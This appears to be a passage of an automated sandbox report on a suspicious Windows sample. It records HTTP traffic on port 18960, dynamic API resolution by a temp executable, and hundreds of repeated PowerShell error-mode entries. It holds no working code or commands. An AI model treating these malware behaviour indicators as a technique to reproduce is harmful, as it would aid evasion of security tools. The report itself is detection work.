                      Source: unknownNetwork traffic detected: HTTP traffic on port 18960 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 18960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 18960 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 18960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 18960 -> 49732
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_004D7960 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_004D7960
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
